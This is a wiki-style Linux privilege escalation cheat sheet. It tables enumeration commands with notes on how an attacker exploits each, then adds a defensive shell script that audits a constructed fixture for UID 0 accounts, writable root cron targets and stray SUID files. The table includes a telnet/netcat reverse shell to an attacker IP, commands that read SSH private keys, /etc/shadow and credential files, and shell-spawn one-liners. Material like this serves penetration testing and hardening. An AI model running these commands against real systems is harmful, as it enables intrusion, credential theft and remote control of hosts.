Privilege Escalation
=== Linux Enumeration Commands ===
{| class="wikitable sortable"
! Purpose !! Command !! Potential Use in Privilege Escalation
|-
| SUID/SGID binaries
| <code>find / -perm -4000 2>/dev/null</code>
| May reveal misconfigured binaries that can be exploited for privilege escalation.
|-
| Kernel version
| <code>uname -a</code>
| Identifies kernel versions that have known local privilege escalation exploits.
|-
| Environment variables
| <code>env</code>
| May expose sensitive paths or misconfigured variables usable in custom script execution.
|-
| Running processes
| <code>ps aux</code>
| Reveals services or scripts running as root; useful for spotting process injection opportunities or misconfigurations.
|-
| Installed packages (Debian)
| <code>dpkg -l</code>
| Can identify vulnerable software versions or unintended package installs.
|-
| Installed packages (Red Hat)
| <code>rpm -qa</code>
| Same as above, but for RPM-based systems.
|-
| Writable directories
| <code>find / -writable -type d 2>/dev/null</code>
| Writable locations may allow backdoor placement, script replacement, or abuse in cron jobs.
|-
| Cron jobs
| <code>cat /etc/crontab</code>
| Look for jobs running as root or referencing writable scripts.
|-
| User info
| <code>cat /etc/passwd</code>
| Useful for identifying users, shell access, and potential privilege chaining.
|-
| Group info
| <code>cat /etc/group</code>
| Can show membership in sensitive groups such as <code>sudo</code>, <code>docker</code>, or <code>adm</code>.
|-
| OS version info (generic)
| <code>cat /etc/issue</code>
| Helps fingerprint the system for targeted exploits.
|-
| OS version info (all common release files)
| <code>cat /etc/*-release</code>
| Same purpose; confirms distro and version for exploit matching.
|-
| OS version (Debian based)
| <code>cat /etc/lsb-release</code>
| Specifically useful for identifying Ubuntu/Debian versions.
|-
| OS version (Red Hat based)
| <code>cat /etc/redhat-release</code>
| Same, but for RHEL/CentOS systems.
|-
| Kernel version & architecture
| <code>cat /proc/version # Shows detailed kernel version and build info</code><br>
<code>uname -a # Displays all system info including kernel name and architecture</code><br>
<code>uname -mrs # Prints kernel name, version, and hardware name</code><br>
<code>rpm -q kernel # Lists installed kernel packages (RPM-based systems)</code><br>
<code>dmesg | grep Linux # Extracts kernel-related boot messages</code><br>
<code>ls /boot | grep vmlinuz- # Lists available kernel images in /boot</code>
| Used to identify kernel-specific vulnerabilities and tailor exploits to the system architecture.
|-
| Environment configuration files
| <code>cat /etc/profile # System-wide environment variables</code><br>
<code>cat /etc/bashrc # System-wide bash shell settings</code><br>
<code>cat ~/.bash_profile # User-specific environment variables</code><br>
<code>cat ~/.bashrc # User-specific bash shell settings</code><br>
<code>cat ~/.bash_logout # Commands run at logout</code><br>
<code>env # Print current environment variables</code>
| Can reveal exposed credentials, custom paths, or insecure settings that can be leveraged for privilege escalation.
|-
| Printer services
| <code>lpstat -a # Lists printers and their status</code>
| May indicate running printer daemons or services with elevated privileges that are misconfigured or can be misused.
|-
| Running services & privileges
| <code>ps aux # Lists all running processes with associated users</code><br>
<code>ps -ef # Alternative view of all processes with full format</code><br>
<code>top # Dynamic real-time process list</code><br>
<code>cat /etc/services # Maps known services to their ports</code>
| Helps identify active services and their privilege levels, which may include insecure or unnecessary daemons.
|-
| Root-owned services
|
<code>ps aux | grep root # Filters running processes owned by root</code><br>
<code>ps -ef | grep root # Alternate full-format view of root-owned processes</code>
| Useful for spotting services running as root that may be vulnerable or misconfigured; valuable targets for privilege escalation.
|-
| Installed applications & versions
| <code>ls -alh /usr/bin/ # Lists applications and binaries in user path</code><br>
<code>ls -alh /sbin/ # Lists system binaries</code><br>
<code>dpkg -l # Lists installed packages (Debian-based systems)</code><br>
<code>rpm -qa # Lists installed packages (RPM-based systems)</code><br>
<code>ls -alh /var/cache/apt/archives # Shows downloaded .deb packages</code><br>
<code>ls -alh /var/cache/yum/ # Shows cached .rpm packages</code>
| Reveals software presence and versions; helpful for identifying vulnerable or exploitable programs that may be running.
|-
| Service config files
| <code>cat /etc/syslog.conf # Syslog daemon configuration</code><br>
<code>cat /etc/chttp.conf # Tiny HTTP server config</code><br>
<code>cat /etc/lighttpd.conf # Lighttpd server config</code><br>
<code>cat /etc/cups/cupsd.conf # Printing service config</code><br>
<code>cat /etc/inetd.conf # Legacy super-server config</code><br>
<code>cat /etc/apache2/apache2.conf # Apache main config (Debian-based)</code><br>
<code>cat /etc/my.cnf # MySQL config file</code><br>
<code>cat /etc/httpd/conf/httpd.conf # Apache main config (RHEL-based)</code><br>
<code>cat /opt/lampp/etc/httpd.conf # XAMPP's Apache config</code><br>
<code>ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^.*r.*/' # Lists readable files under /etc/ (potential misconfigurations)</code>
| Checking these can reveal misconfigured services, overly permissive settings, or vulnerable modules that open attack vectors.
|-
| Scheduled jobs
| <code>crontab -l # List current user's cron jobs</code><br>
<code>ls -alh /var/spool/cron # View cron job files for users</code><br>
<code>ls -al /etc/ | grep cron # Search for cron-related files</code><br>
<code>ls -al /etc/cron* # List contents of cron directories</code><br>
<code>cat /etc/cron* # Print content of all cron config files</code><br>
<code>cat /etc/at.allow # Users allowed to use 'at'</code><br>
<code>cat /etc/at.deny # Users denied from using 'at'</code><br>
<code>cat /etc/cron.allow # Users allowed to use cron</code><br>
<code>cat /etc/cron.deny # Users denied from using cron</code><br>
<code>cat /etc/crontab # System-wide cron job definitions</code><br>
<code>cat /etc/anacrontab # anacron job scheduler config</code><br>
<code>cat /var/spool/cron/crontabs/root # Root's scheduled cron jobs</code>
| Scheduled jobs may reveal tasks running as root, outdated scripts, or writable paths exploitable for privilege escalation.
|-
| Plaintext credentials
| <code>grep -i user [filename] # Search for 'user' (case-insensitive)</code><br>
<code>grep -i pass [filename] # Search for 'pass' (case-insensitive)</code><br>
<code>grep -C 5 "password" [filename] # Show context around 'password'</code><br>
<code>find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password' # Look for hardcoded credentials in PHP files (e.g., Joomla); single quotes keep the shell from expanding $password</code>
| These patterns help uncover stored plaintext usernames or passwords in misconfigured or insecure code and config files.
|-
| Network interfaces
| <code>/sbin/ifconfig -a # Show all network interfaces and their status</code><br>
<code>cat /etc/network/interfaces # Network config (Debian-based)</code><br>
<code>cat /etc/sysconfig/network # Network config (RHEL-based)</code>
| Identifies available network interfaces and reveals whether the system is connected to other networks; useful for lateral movement or pivoting.
|-
| Network configuration
| <code>cat /etc/resolv.conf # Shows DNS servers</code><br>
<code>cat /etc/sysconfig/network # Hostname, default gateway (RHEL-based)</code><br>
<code>cat /etc/networks # Legacy network name mappings</code><br>
<code>iptables -L # Lists firewall rules</code><br>
<code>hostname # Shows system hostname</code><br>
<code>dnsdomainname # Shows domain part of system's FQDN</code>
| Helps reveal DNS, gateway, and firewall configuration; can indicate internal network structure and potential egress routes.
|-
| Active connections & services
| <code>lsof -i # Lists open network connections</code><br>
<code>lsof -i :80 # Check if web service is active</code><br>
<code>grep 80 /etc/services # Maps port 80 to service name</code><br>
<code>netstat -antup # Shows all TCP/UDP connections with PID</code><br>
<code>netstat -antpx # All TCP connections plus Unix domain sockets, with PID</code><br>
<code>netstat -tulpn # All listening services with PID</code><br>
<code>chkconfig --list # Lists services and runlevels</code><br>
<code>chkconfig --list | grep 3:on # Services started in runlevel 3</code><br>
<code>last # Login history of users</code><br>
<code>w # Who is currently logged in</code>
| Reveals running services, user activity, and possible internal communication; useful for identifying targets or attack surfaces.
|-
| Cached network data
| <code>arp -e # ARP table (IP to MAC mappings)</code><br>
<code>route # Kernel routing table</code><br>
<code>/sbin/route -nee # Detailed routing info with interface names</code>
| Displays cached IP and MAC addresses and routing paths; may expose other systems on the network or paths for movement.
|-
| Shell access & interaction
| <code>nc -lvp 4444 # Attacker. Input (Commands)</code><br>
<code>nc -lvp 4445 # Attacker. Output (Results)</code><br>
<code>telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the target's system. Use the attacker's IP!</code>
| Establishing an interactive shell can allow full control of the compromised system, enabling command execution and data exfiltration.
|-
| Tunneling & redirection
| <code>ssh -D 127.0.0.1:9050 -N [username]@[ip] # Create SOCKS proxy for local tunneling</code><br>
<code>proxychains ifconfig # Test command routing through proxy</code>
| Useful for pivoting through the network or anonymizing outbound traffic via local or remote tunneling.
|-
| User identity & privilege
| <code>id # Show current user ID and group</code><br>
<code>who # List currently logged-in users</code><br>
<code>w # Show who is logged in and what they are doing</code><br>
<code>last # List recent user logins</code><br>
<code>cat /etc/passwd | cut -d: -f1 # List of system users</code><br>
<code>grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }' # Identify superuser accounts</code><br>
<code>awk -F: '($3 == "0") {print}' /etc/passwd # Another way to list UID 0 accounts</code><br>
<code>cat /etc/sudoers # View sudo privileges</code><br>
<code>sudo -l # List current user's sudo rights</code>
| Helps determine current privileges, available escalation paths, and visibility of other user accounts on the system.
|-
| Sensitive files
| <code>cat /etc/passwd # User account information</code><br>
<code>cat /etc/group # Group definitions</code><br>
<code>cat /etc/shadow # Password hashes (requires root)</code><br>
<code>ls -alh /var/mail/ # User mailboxes, may contain sensitive data</code>
| These files can expose system users, password hashes, and private data if permissions are misconfigured or access is gained through privilege escalation.
|-
| Home directory inspection
| <code>ls -ahlR /root/ # Recursively list all files in root's home directory</code><br>
<code>ls -ahlR /home/ # Recursively list all user home directories</code>
| May reveal leftover files, misconfigured permissions, SSH keys, or credentials stored in plaintext.
|-
| Password storage in known files
| <code>cat /var/apache2/config.inc # May contain hardcoded database credentials</code><br>
<code>cat /var/lib/mysql/mysql/user.MYD # Raw MySQL user table data</code><br>
<code>cat /root/anaconda-ks.cfg # Kickstart config file, often contains root password in plaintext</code>
| These locations may store sensitive data such as database passwords or install-time credentials.
|-
| User activity & command history
| <code>cat ~/.bash_history # Shell command history</code><br>
<code>cat ~/.nano_history # Nano editor history</code><br>
<code>cat ~/.atftp_history # atftp client history</code><br>
<code>cat ~/.mysql_history # MySQL client history</code><br>
<code>cat ~/.php_history # PHP interactive shell history</code>
| Reviewing history files can expose credentials, database access, or other sensitive commands typed by the user.
|-
| Local user information
| <code>cat ~/.bashrc # User shell configuration</code><br>
<code>cat ~/.profile # User environment profile</code><br>
<code>cat /var/mail/root # Root user's email inbox</code><br>
<code>cat /var/spool/mail/root # Another root mail location</code>
| These files may reveal environmental setups, messages with credentials, or scripts executed at login.
|-
| SSH key & config files
| <code>cat ~/.ssh/authorized_keys # Allowed public keys for login</code><br>
<code>cat ~/.ssh/identity.pub # Public key used for SSH auth</code><br>
<code>cat ~/.ssh/identity # Private key (sensitive)</code><br>
<code>cat ~/.ssh/id_rsa.pub # RSA public key</code><br>
<code>cat ~/.ssh/id_rsa # RSA private key</code><br>
<code>cat ~/.ssh/id_dsa.pub # DSA public key</code><br>
<code>cat ~/.ssh/id_dsa # DSA private key</code><br>
<code>cat /etc/ssh/ssh_config # SSH client configuration</code><br>
<code>cat /etc/ssh/sshd_config # SSH daemon configuration</code><br>
<code>cat /etc/ssh/ssh_host_dsa_key.pub # Host DSA public key</code><br>
<code>cat /etc/ssh/ssh_host_dsa_key # Host DSA private key</code><br>
<code>cat /etc/ssh/ssh_host_rsa_key.pub # Host RSA public key</code><br>
<code>cat /etc/ssh/ssh_host_rsa_key # Host RSA private key</code><br>
<code>cat /etc/ssh/ssh_host_key.pub # Legacy host public key</code><br>
<code>cat /etc/ssh/ssh_host_key # Legacy host private key</code>
| These files may expose private SSH keys, login credentials, or insecure configurations that enable unauthorized access.
|-
| Writable config files in /etc/
|
<code>ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^.*w.*/' # Files in /etc/ with any write bit set</code><br>
<code>ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^..w/' # Owner-writable files</code><br>
<code>ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^.....w/' # Group-writable files</code><br>
<code>ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /w.$/' # Other-writable (world-writable) files</code><br>
<code>find /etc/ -readable -type f 2>/dev/null # All readable files in /etc/</code><br>
<code>find /etc/ -maxdepth 1 -readable -type f 2>/dev/null # Readable top-level files only</code>
| Writable configuration files may allow privilege escalation by altering service behavior or execution paths.
|-
| Contents of /var/
| <code>ls -alh /var/log # Logs from services and the system</code><br>
<code>ls -alh /var/mail # Mailboxes for users</code><br>
<code>ls -alh /var/spool # Scheduled tasks, print queues, and mail spools</code><br>
<code>ls -alh /var/spool/lpd # Line printer daemon data</code><br>
<code>ls -alh /var/lib/pgsql # PostgreSQL data directory</code><br>
<code>ls -alh /var/lib/mysql # MySQL database directory</code><br>
<code>cat /var/lib/dhcp3/dhclient.leases # DHCP lease information</code>
| These directories may hold logs, mail, databases, or cached network info that could leak sensitive data or credentials.
|-
| Web directories and config files
| <code>ls -alhR /var/www/ # Default web root on many systems</code><br>
<code>ls -alhR /srv/www/htdocs/ # SUSE/openSUSE web root</code><br>
<code>ls -alhR /usr/local/www/apache22/data/ # FreeBSD Apache web root</code><br>
<code>ls -alhR /opt/lampp/htdocs/ # XAMPP web root</code><br>
<code>ls -alhR /var/www/html/ # Common web root (e.g. CentOS, Ubuntu)</code>
| Useful for discovering exposed config files, credentials, or sensitive content in hosted web applications.
|-
| Log file inspection
| <code>cat /etc/httpd/logs/access_log # Apache access log</code><br>
<code>cat /etc/httpd/logs/access.log # Apache access log alt path</code><br>
<code>cat /etc/httpd/logs/error_log # Apache error log</code><br>
<code>cat /etc/httpd/logs/error.log # Apache error log alt path</code><br>
<code>cat /var/log/apache2/access_log # Apache2 access log</code><br>
<code>cat /var/log/apache2/access.log # Apache2 access log alt path</code><br>
<code>cat /var/log/apache2/error_log # Apache2 error log</code><br>
<code>cat /var/log/apache2/error.log # Apache2 error log alt path</code><br>
<code>cat /var/log/apache/access_log # Apache access log (alt)</code><br>
<code>cat /var/log/apache/access.log # Apache access log (alt)</code><br>
<code>cat /var/log/auth.log # Authentication events</code><br>
<code>cat /var/log/chttp.log # cHTTP log</code><br>
<code>cat /var/log/cups/error_log # Printer service log</code><br>
<code>cat /var/log/dpkg.log # Package installation log (Debian)</code><br>
<code>cat /var/log/faillog # Failed login attempts</code><br>
<code>cat /var/log/httpd/access_log # Apache access log</code><br>
<code>cat /var/log/httpd/access.log # Apache access log</code><br>
<code>cat /var/log/httpd/error_log # Apache error log</code><br>
<code>cat /var/log/httpd/error.log # Apache error log</code><br>
<code>cat /var/log/lastlog # Last login of all users</code><br>
<code>cat /var/log/lighttpd/access.log # Lighttpd access log</code><br>
<code>cat /var/log/lighttpd/error.log # Lighttpd error log</code><br>
<code>cat /var/log/lighttpd/lighttpd.access.log # Lighttpd alt access log</code><br>
<code>cat /var/log/lighttpd/lighttpd.error.log # Lighttpd alt error log</code><br>
<code>cat /var/log/messages # General system messages</code><br>
<code>cat /var/log/secure # Security/authentication log</code><br>
<code>cat /var/log/syslog # System log (Ubuntu, Debian)</code><br>
<code>cat /var/log/wtmp # Login history (binary format)</code><br>
<code>cat /var/log/xferlog # FTP file transfer log</code><br>
<code>cat /var/log/yum.log # YUM package manager log</code><br>
<code>cat /var/run/utmp # Current logins (binary format)</code><br>
<code>cat /var/webmin/miniserv.log # Webmin log</code><br>
<code>cat /var/www/logs/access_log # Apache access log (within web root)</code><br>
<code>cat /var/www/logs/access.log # Apache access log (within web root)</code><br>
<code>ls -alh /var/lib/dhcp3/ # DHCP lease and config files</code><br>
<code>ls -alh /var/log/postgresql/ # PostgreSQL logs</code><br>
<code>ls -alh /var/log/proftpd/ # FTP server logs</code><br>
<code>ls -alh /var/log/samba/ # SMB service logs</code>
| Reviewing log files may reveal usernames, passwords, visited URLs, session tokens, or useful paths for local file inclusion (LFI) or privilege escalation.
|-
| Shell escape techniques
| <code>python -c 'import pty;pty.spawn("/bin/bash")' # Spawn interactive bash shell via Python</code><br>
<code>echo os.system('/bin/bash') # Execute bash from within echo/os.system()</code><br>
<code>/bin/sh -i # Interactive shell via /bin/sh</code>
| Useful for escaping restricted shells or limited environments to gain a fully interactive session.
|-
| Mounted file-systems
| <code>mount # Show all currently mounted file systems</code><br>
<code>df -h # Show disk usage in human-readable format</code>
| Reveals mounted volumes, file systems, and potential writable targets for persistence or data access.
|-
| Unmounted file-systems
| <code>cat /etc/fstab # Configuration file for disk mounting at boot</code>
| Shows devices intended for mounting; may reveal hidden partitions, backup volumes, or encrypted containers.
|-
| Advanced file permissions
| <code>find / -perm -1000 -type d 2>/dev/null # Sticky bit directories (e.g., /tmp)</code><br>
<code>find / -perm -g=s -type f 2>/dev/null # Files with SGID set</code><br>
<code>find / -perm -u=s -type f 2>/dev/null # Files with SUID set</code><br>
<code>find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null # SGID or SUID files (parentheses keep -type f applying to both)</code><br>
<code>for i in `locate -r "bin$"`; do find "$i" \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Search *bin dirs for SGID/SUID</code><br>
<code>find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null # SUID/SGID search to depth 3, excluding symlinks</code>
| SUID/SGID/sticky permissions are a common source of privilege escalation vectors, especially on older systems or misconfigured apps.
|-
| Writable & executable directories
| <code>find / -writable -type d 2>/dev/null # Directories writable by the current user</code><br>
<code>find / -perm -222 -type d 2>/dev/null # Directories writable by owner, group, and others</code><br>
<code>find / -perm -o=w -type d 2>/dev/null # World-writable directories</code><br>
<code>find / -perm -o=x -type d 2>/dev/null # World-executable (searchable) directories</code><br>
<code>find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null # Directories writable & executable by anyone</code>
| Identifies folders where an attacker can drop binaries or scripts for execution; commonly abused for persistence and privilege escalation.
|-
| Problematic files & ownership
| <code>find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print 2>/dev/null # World-writable dirs without sticky bit</code><br>
<code>find /dir -xdev \( -nouser -o -nogroup \) -print 2>/dev/null # Files with no valid user/group owner</code>
| These can indicate misconfigured permissions, abandoned files, or opportunities to tamper with files belonging to no defined user.
|-
| Available dev tools & languages
| <code>find / -name 'perl*' 2>/dev/null # Locate Perl installations (quote the glob so the shell does not expand it)</code><br>
<code>find / -name 'python*' 2>/dev/null # Locate Python interpreters</code><br>
<code>find / -name 'gcc*' 2>/dev/null # Locate GNU Compiler Collection binaries</code><br>
<code>find / -name cc 2>/dev/null # Locate C compiler</code>
| Identifying available programming environments allows exploit code to be compiled or interpreted locally; essential for privilege escalation via code execution.
|-
| File upload capabilities
| <code>find / -name wget 2>/dev/null # Check for file download via wget</code><br>
<code>find / -name 'nc*' 2>/dev/null # Netcat binaries</code><br>
<code>find / -name 'netcat*' 2>/dev/null # Alternative name for Netcat</code><br>
<code>find / -name 'tftp*' 2>/dev/null # TFTP client</code><br>
<code>find / -name ftp 2>/dev/null # Basic FTP client</code>
| Discovering which tools are present for file transfer helps determine how exploits, scripts, or reverse shells can be delivered to the system.
|-
| System patch level
| <code>apt-get update && apt-get upgrade # Update package lists and upgrade all packages (Debian-based)</code><br>
<code>yum update # Update all packages (RHEL-based)</code>
| Helps determine if the system has known vulnerabilities due to missing patches. Unpatched systems are often exploitable through public CVEs.
|}
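As an added example that is not part of the original page, the POSIX shell script below turns three of the table's checks (UID 0 accounts in <code>/etc/passwd</code>, root cron jobs that reference group- or other-writable scripts, and SUID files outside an expected list) into a read-only audit a defender can run against a host or a fixture. The function names, the allow-list file and the temporary fixture it builds are constructed for this example and are not from the page.

```shell
#!/bin/sh
# Added example (not from the page): a read-only audit for three of the
# misconfigurations the enumeration table looks for. All names are hypothetical.

# 1. passwd-format file ($1): accounts with UID 0 that are not "root".
extra_uid0_accounts() {
    awk -F: '!/^#/ && $3 == 0 && $1 != "root" { print $1 }' "$1"
}

# 2. System crontab ($1, format: min hour dom mon dow user command): print the
#    script path of every root job whose file is group- or other-writable.
#    $2 is an optional filesystem prefix so the check can run on a fixture.
writable_root_cron_targets() {
    prefix=${2:-}
    awk '!/^#/ && NF >= 7 && $6 == "root" { print $7 }' "$1" | sort -u |
    while IFS= read -r target; do
        f="$prefix$target"
        [ -f "$f" ] || continue
        # Same idea as the table's awk-on-ls checks: char 6 = group w, char 9 = other w.
        ls -ld "$f" | awk -v p="$target" '$1 ~ /^.....w/ || $1 ~ /^........w/ { print p }'
    done
}

# 3. SUID files under a tree ($1) whose basename is not in the allow-list file ($2).
unexpected_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | while IFS= read -r f; do
        grep -qx "$(basename "$f")" "$2" || echo "$f"
    done
}

# Constructed fixture standing in for "/": a passwd file with a second UID 0
# account, a crontab with one root job pointing at a world-writable script,
# and a stray SUID file not on the allow-list.
build_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/etc" "$root/usr/local/bin" "$root/opt/backup"
    printf 'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1::/usr/sbin:/usr/sbin/nologin\ntoor:x:0:0::/root:/bin/sh\n' > "$root/etc/passwd"
    printf '# constructed crontab\n0 2 * * * root /opt/backup/run.sh\n*/5 * * * * root /usr/local/bin/check.sh\n' > "$root/etc/crontab"
    printf '#!/bin/sh\necho backup\n' > "$root/opt/backup/run.sh"
    chmod 777 "$root/opt/backup/run.sh"          # the misconfiguration
    printf '#!/bin/sh\necho ok\n' > "$root/usr/local/bin/check.sh"
    chmod 755 "$root/usr/local/bin/check.sh"     # correctly protected
    printf '' > "$root/usr/local/bin/helper"
    chmod 4755 "$root/usr/local/bin/helper"      # unexpected SUID bit
    printf 'sudo\npasswd\nsu\n' > "$root/etc/suid-allowlist"
    echo "$root"
}

root=$(build_fixture)
echo "UID 0 accounts besides root:"; extra_uid0_accounts "$root/etc/passwd"
echo "Root cron jobs running writable scripts:"; writable_root_cron_targets "$root/etc/crontab" "$root"
echo "Unexpected SUID files:"; unexpected_suid "$root/usr" "$root/etc/suid-allowlist"
rm -rf "$root"
```

To audit a live host instead of the fixture, call the functions with real paths, e.g. <code>extra_uid0_accounts /etc/passwd</code> and <code>writable_root_cron_targets /etc/crontab</code>, and keep the allow-list to the SUID binaries the distribution ships.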